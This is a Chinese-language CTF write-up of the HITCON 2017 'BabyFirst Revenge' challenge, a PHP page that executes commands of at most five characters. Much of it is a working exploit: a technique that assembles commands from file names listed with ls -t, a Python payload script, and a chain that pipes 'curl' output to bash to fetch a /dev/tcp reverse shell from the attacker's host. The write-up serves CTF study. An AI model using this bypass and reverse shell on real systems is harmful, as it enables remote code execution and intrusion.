[hitcon2017] BabyFirst Revenge复现

hitcon的题好难啊！！！！！
还是太菜了。。Orz
只能够赛后搭环境复现了。。
分享本题自制Dockerfile：Github

这题是一个特别的命令执行题， 首先进去首页之后发现以下源码

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

无论我们传什么进去他都会照单执行，但是每次的长度限制为最多5个字符，正常来说最短(?)的写shell方式应该是

echo x>>1
....
sh 1

但是其实我们可以利用ls来写shell，如下：

>a
ls>_
sh _  #也就执行了a指令 但是没有意义，所以我们就要构造一系列的指令出来追加到文件里

那么这里就涉及到几个问题：

1. ls出来是按照什么顺序排列的文件？
2. 追加文件的时候会自动加入换行 这个问题要怎么解决？
3. 如果ls途中有无用的文件怎么办？ 因为如果是以上的做法的话其实cat _你会发现里面还有一个_文件

答案：

1. ls -l的默认排序方式手册上写了是alphabetically（字典序）也就是说有可能后面加入的文件名排在前面，为了避免这个问题我们可以加入-t参数来使ls之后的结果按照最近修改的文件在前面的方式排列
2. linux的命令执行中支持命令换行 需要用到反斜杠\ 写到最后面，如： 🌰
3. 其实bash在执行脚本的时候遇到未知的命令会报错 但是这并不会使之退出，bash会继续执行下一行的命令，如图 🌰

那到这里思路其实已经挺清晰的了, 就是通过写入一系列指令的分段，并用反斜杠\作为文件结尾，最后执行ls -t>g并且sh g来执行我们想要的指令，这里以执行反弹shell为例：

curl 10.188.2.20|bash

我的10.188.2.20/index.html文件内容为:

bash -i >& /dev/tcp/10.188.2.20/12345 0>&1

• 写入 ls -t>g指令到_文件

?cmd=>ls\\    #创建ls\
?cmd=ls>_    #创建 _ 文件 文件内容为_ \n ls\ \n
?cmd=>\ \\    #创建 \空格 文件
?cmd=>-t\\    #创建 -t\ 文件
?cmd=>\>g    #创建 >g 文件
?cmd=ls>>_   #将刚刚创建的文件名按照字典序写入_文件 这里的字典序是特殊符号在ls\的前面 所以在生成ls\之后我们要先ls>_ 保证ls\在最前面

最后生成的_文件结果如图：

最后我们需要生成我们自己的命令的时候直接sh _就可以在g文件里面生成我们想要的命令了 然后再sh g就可以rce了

比如我要执行 curl 10.188.2.20|bash (index.html已经提前放好反弹shell的命令)

因为这是按照时间倒叙ls 所以我要倒着生成我要执行的指令文件，比如orange大大的exp：

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    # generate `curl 10.188.2.20|bash` 
    '>sh\ ', 
    '>ba\\', 
    '>\|\\',
    '>20\\',
    '>2.\\', 
    '>8.\\',
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # exec
    'sh _', 
    'sh g', 
]



r = requests.get('http://10.188.2.20:22460/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://10.188.2.20:22460/?cmd=' + quote(i) )
    print i
    sleep(0.2)

在生成自己的命令时要注意各个命令段之间名字不能相同 因为不能生成两个带有相同命令段的文件名

//偷懒偷了好久才复现的。。Orz。。。。批评一下自己的懒惰。。
各位大佬有啥更好的思路欢迎分享

参考:
https://github.com/orangetw/My-CTF-Web-Challenges